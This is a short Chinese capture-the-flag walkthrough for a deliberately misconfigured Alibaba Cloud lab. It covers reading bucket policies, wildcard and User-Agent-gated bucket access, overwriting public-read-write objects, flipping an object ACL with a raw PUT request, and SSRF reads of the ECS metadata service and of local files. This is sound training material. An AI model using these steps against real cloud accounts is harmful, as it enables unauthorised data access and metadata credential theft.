目录
OSS-bucket_policy_readable
OSS-object_public_access
OSS-bucket_object_traversal
OSS-Special Bucket Policy
OSS-unrestricted_file_upload
OSS-object_acl_writable
ECS-SSRF
云攻防场景下对云厂商服务的利用大同小异,下面以阿里云为例
其他如腾讯云、华为云、谷歌云、AWS、Azure不一一列举
OSS-bucket_policy_readable
桶策略可读
?policy可以看到存储桶策略
成功读到flag
OSS-object_public_access
对象公共访问
resource "alicloud_oss_bucket_object" "huoxian_terraformgoat_object" {
bucket = alicloud_oss_bucket.huoxian_terraformgoat_bucket.bucket
acl = "public-read"
key = "flag"
source = "./flag"
depends_on = [alicloud_oss_bucket.huoxian_terraformgoat_bucket]
}
访问./flag
OSS-bucket_object_traversal
存储桶对象遍历
{
"Effect": "Allow",
"Action": [
"oss:ListObjects",
"oss:GetObject"
],
"Principal": [
"*"
],
"Resource": [
"acs:oss:*:*:*"
],
"Condition": {
"StringLike": {
"oss:Prefix": [
"*"
]
}
}
}
OSS-Special Bucket Policy
特殊存储桶策略
{
"Effect": "Allow",
"Action": [
"oss:ListObjects",
"oss:GetObject"
],
"Principal": [
"*"
],
"Resource": [
"acs:oss:*:*:*"
],
"Condition": {
"StringEquals": {
"acs:UserAgent": [
"HxSecurityLab"
]
}
}
}默认无权限访问
加上UA头
User-Agent: HxSecurityLab
OSS-unrestricted_file_upload
不受限制的文件上传
resource "alicloud_oss_bucket_object" "flag" {
bucket = alicloud_oss_bucket.Put_bucket_acl.bucket
key = "hx.png"
source = "./dist/hx.png"
content_type = "inline"
acl = "public-read-write"
}
PUT覆盖原有文件
PUT新建文件
OSS-object_acl_writable
对象ACL可写
{
"Version": "1",
"Statement": [{
"Effect": "Allow",
"Action": [
"oss:GetObjectAcl",
"oss:PutObjectAcl"
],
"Principal": [
"*"
],
"Resource": [
"acs:oss:*:*:*/*"
]
}]
}
直接访问flag.txt,403
查看acl
通过PUT方法将Object的ACL改为public-read
PUT /flag.txt?acl HTTP/1.1
Host: hx-cloud-security-2rr50.oss-cn-beijing.aliyuncs.com
x-oss-object-acl: public-read
看到成功修改
成功读到flag
ECS-SSRF
用户可以通过 SSRF 漏洞获取到 ECS 上的元数据、用户数据等信息。
读取元数据
http://100.100.100.200/latest/meta-data/100.100.100.200 是一个特殊的保留 IP 地址,用于阿里云的元数据服务(Metadata Service)。它允许云服务器实例从内部网络获取自身的元数据,而无需访问外网。
读取用户数据
http://100.100.100.200/latest/user-data/User Data:用户在创建 ECS 时传入的脚本或配置
读flag
file:///flag69152201.txt
